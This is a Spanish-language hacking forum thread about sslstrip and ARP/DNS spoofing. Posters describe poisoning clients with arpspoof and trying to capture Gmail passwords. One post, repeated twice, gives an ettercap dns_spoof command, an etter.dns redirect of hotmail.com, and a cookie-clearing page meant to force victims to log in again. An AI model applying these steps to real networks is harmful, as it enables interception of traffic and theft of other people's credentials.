elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
27 Mayo 2012, 18:36  


Tema destacado: Recuperar cuenta de Google, GMail, Youtube

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking Avanzado (Moderadores: ANELKAOS, TRICKY)
| | |-+  sslstrip & arpspoof (cerrar conexión)
0 Usuarios y 2 Visitantes están viendo este tema.
Páginas: 1 [2] Ir Abajo Respuesta Imprimir
Autor Tema: sslstrip & arpspoof (cerrar conexión)  (Leído 2,790 veces)
adastra
Endless Learner
Colaborador
***
Desconectado Desconectado

Mensajes: 624


http://thehackerway.com/


Ver Perfil WWW
Re: sslstrip & arpspoof (cerrar conexión)
« Respuesta #15 en: 18 Noviembre 2011, 17:01 »

Si, lo que pasa es que tienes que realizar 2 envenenamientos, 1 para los clientes ethernet y otros para la wifi, en cada caso especificas la interfaz con arpspoof -i eth0/wlan0 no puedes envenenarlos a todos de golpe, ya que se debe especificar una sola interfaz a la vez, por eso tendrás que abrir dos consolas y cada una envenenar a sus correspondientes clientes, el resto del procedimiento es el mismo.
Por otro lado, desde windows para hacer un envenanamiento, lo puedes hacer con "Cain y Abel" no es un programa que haya usado mucho porque soy usuario de Linux y con windows he trabajado más bien poco, pero he comprobado que con "Cain y Abel" puedes hacer las mismas operaciones de "ARP Poisoned/ARP Spoofing" que puedes hacer con dsniff o ettercap.
En línea

http://twitter.com/jdaanial
http://thehackerway.com/

"Nunca discutas con un idiota, podria no notarse la diferencia"
Kant.
rigg

Desconectado Desconectado

Mensajes: 10


Ver Perfil
Re: sslstrip & arpspoof (cerrar conexión)
« Respuesta #16 en: 22 Noviembre 2011, 18:39 »

Gracias adastra,

el programa Cain & Abel lo conocia. Sirve para hacer MITM, es decir hacer que todo el tráfico pase por el. Lo decía ya que como el ISA Server es lo mismo ya que es una especie de proxy avanzado en el cual se puede gestionar toda la red no se si existe algun script o filtro para poder leer ese trafico en concreto el HTTPS que es lo que me haría falta, pero con el Isa Server se gestiona todos los clientes, puertos, etc...
En línea
wuser

Desconectado Desconectado

Mensajes: 3


Ver Perfil
Re: sslstrip & arpspoof (cerrar conexión)
« Respuesta #17 en: 29 Noviembre 2011, 15:38 »

Aprovecho este hilo para preguntaros una duda acerca del sslstrip.
He probado varios procedimientos para pillar usuario y password de gmail con el sslstrip (con mi cuenta, solo para aprender), y ni usando ettercap ni usando solo sslstrip+ip forward+iptables+arpspoof lo consigo. El problema es que todo funciona ok, el equipo victima esta envenenado ok y navegando, y el sslstrip funcionando y a la espera en el equipo atacante. En cuanto me meto en gmail con firefox 8 en el equipo victima, empiezan a salir errores extraños en el ssltrip v0.9 (excepciones) y no se lee nada en el log, esto es, no pone nada de user y password, aunque se ven cosas. Uso el Backtrack 4 final. ¿Alguien me podria decir los pasos exactos para conseguirlo con esa distro? He seguido muchos tutoriales, y ninguno me ha funcionado.
En línea
iancrowley

Desconectado Desconectado

Mensajes: 2


Ver Perfil
Re: sslstrip & arpspoof (cerrar conexión)
« Respuesta #18 en: 20 Diciembre 2011, 03:51 »

tengo el mismo problema!!!!

error L3 con ettercap.. hoy intente solo con arpsoof  pero no pasa nada..  porfavor avisame si lograste resolver el problema
En línea
thefactumest

Desconectado Desconectado

Mensajes: 32


Ver Perfil
Re: sslstrip & arpspoof (cerrar conexión)
« Respuesta #19 en: 4 Enero 2012, 03:25 »

Hola a todos los que han comentado esta pregunta, la Conclusión fue muy buena (la de controlar una pagina que contenga un codigo que elimine las cookies) ... alguien de ustedes puede decirme ¿cual es la forma correcta para hacerlo? ... veran les cuento lo que hago... (no me ha funcionado, asi que agradeceria que me dijeran: ¿que es lo que hago mal? o ¿que me falta hacer? ...

COMIENZO modificando el fichero "index.html" ubicado en: " root/var/www "  (obiamente mis intenciones son las de hacer un servidor apache con el codigo funcional antes mencionado:

<META HTTP-EQUIV="REFRESH" CONTENT="5;URL=javascript:window.history.back();">

//Código en javascript que me elimina las cookies

<body >
 <script language="javascript" type="text/javascript">
 if (document.cookie != "") {
 if (confirm("Eliminar todas las Cookies?")) {
 la_cookie = document.cookie.split("; ")
 fecha_fin = new Date
 fecha_fin.setDate(fecha_fin.getDate()-1)
 for (i=0; i<la_cookie.length; i++) {
 mi_cookie = la_cookie.split("=")[0]
 document.cookie = mi_cookie + "=;expires=" + fecha_fin.toGMTString()
 }
 document.write("Se han eliminado: " + la_cookie.length + " Cookies ")
 }
 }
 </script>
 </body>

Lo copio y lo pego tal cual esta... Despues voy a: " backtrack,services,HTTPD,apache_start " (para activar un servidor apache)  cabe mencionar que borro las 2 carpetas que estan en la misma ubicacion que el "index.html" con la intencion de que no estorben en la apertura de la pagina...
paso seguido procedo a modificar la tabla dns abriendo una consola y tecleando :
#locate etter.dns
#nano /usr/share/ettercap/etter.dns
ya que me abre la tabla dns, procedo a sustituir las direcciones ip que estan ahi indicadas, por la mia (en la que ahora esta corriendo el servidor apache con el codigo para borrar las cookies)...
y como la pagina que quiero cerrar es la de hotmail, me que da de la siguiente manera... :

# microsoft sucks ;)
# redirect it to www.linux.org
#

hotmail.com      A   MI_DIRECCION_IP
*.hotmail.com    A   MI_DIRECCION_IP
www.hotmail.com  PTR MI_DIRECCION_IP      # Wildcards in PTR are not allowed

guardo los cambios y procedo a ejecutar :  "ettercap -T -q -i wlan0 -P dns_spoof -M arp // // "

EN RESUMEN: lo que hice fue crear un servidor apache con el codigo para borrar las cookies antes indicado, despues Hacer un envenenemiento dns para reedirigir hotmail al servidor apache... lamentablemente no he tenido muy buenos resultados... ¿Podrian ayudarme?   muchas gracias...




 

En línea
thefactumest

Desconectado Desconectado

Mensajes: 32


Ver Perfil
Re: sslstrip & arpspoof (cerrar conexión)
« Respuesta #20 en: 4 Enero 2012, 04:44 »

Hola a todos los que han comentado esta pregunta, la Conclusión fue muy buena (la de controlar una pagina que contenga un codigo que elimine las cookies) ... alguien de ustedes puede decirme ¿cual es la forma correcta para hacerlo? ... veran les cuento lo que hago... (no me ha funcionado, asi que agradeceria que me dijeran: ¿que es lo que hago mal? o ¿que me falta hacer? ...

COMIENZO modificando el fichero "index.html" ubicado en: " root/var/www "  (obiamente mis intenciones son las de hacer un servidor apache con el codigo funcional antes mencionado:

<META HTTP-EQUIV="REFRESH" CONTENT="5;URL=javascript:window.history.back();">

//Código en javascript que me elimina las cookies

<body >
 <script language="javascript" type="text/javascript">
 if (document.cookie != "") {
 if (confirm("Eliminar todas las Cookies?")) {
 la_cookie = document.cookie.split("; ")
 fecha_fin = new Date
 fecha_fin.setDate(fecha_fin.getDate()-1)
 for (i=0; i<la_cookie.length; i++) {
 mi_cookie = la_cookie.split("=")[0]
 document.cookie = mi_cookie + "=;expires=" + fecha_fin.toGMTString()
 }
 document.write("Se han eliminado: " + la_cookie.length + " Cookies ")
 }
 }
 </script>
 </body>

Lo copio y lo pego tal cual esta... Despues voy a: " backtrack,services,HTTPD,apache_start " (para activar un servidor apache)  cabe mencionar que borro las 2 carpetas que estan en la misma ubicacion que el "index.html" con la intencion de que no estorben en la apertura de la pagina...
paso seguido procedo a modificar la tabla dns abriendo una consola y tecleando :
#locate etter.dns
#nano /usr/share/ettercap/etter.dns
ya que me abre la tabla dns, procedo a sustituir las direcciones ip que estan ahi indicadas, por la mia (en la que ahora esta corriendo el servidor apache con el codigo para borrar las cookies)...
y como la pagina que quiero cerrar es la de hotmail, me que da de la siguiente manera... :

# microsoft sucks
# redirect it to www.linux.org
#

hotmail.com      A   MI_DIRECCION_IP
*.hotmail.com    A   MI_DIRECCION_IP
www.hotmail.com  PTR MI_DIRECCION_IP      # Wildcards in PTR are not allowed

guardo los cambios y procedo a ejecutar :  "ettercap -T -q -i wlan0 -P dns_spoof -M arp // // "

EN RESUMEN: lo que hice fue crear un servidor apache con el codigo para borrar las cookies antes indicado, despues Hacer un envenenemiento dns para reedirigir hotmail al servidor apache... lamentablemente no he tenido muy buenos resultados... ¿Podrian ayudarme?   muchas gracias...

http://foro.elhacker.net/hacking_avanzado/iquestcomo_cerrar_conexiones_para_usar_sslstrip-t349415.0.html;msg1702555;topicseen#ixzz1iSQEPoRi
En línea
Páginas: 1 [2] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Duda al cerrar la conexion mysql desde php
PHP
mit 4 5,175 Último mensaje 21 Diciembre 2008, 23:11
por mit
como cerrar mi conexion a internet de manera automatica
Redes
Amagekure 1 1,978 Último mensaje 6 Diciembre 2009, 22:43
por fran006
Problema Con Arpspoof
GNU/Linux
Fayre 0 1,592 Último mensaje 4 Agosto 2010, 18:37
por Fayre
La mejor forma de cerrar una conexión
Bases de Datos
dimitrix 3 558 Último mensaje 16 Mayo 2011, 12:49
por dimitrix
¿como cerrar conexiones para usar sslstrip?
Hacking Avanzado
thefactumest 5 809 Último mensaje 5 Enero 2012, 23:45
por adastra
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines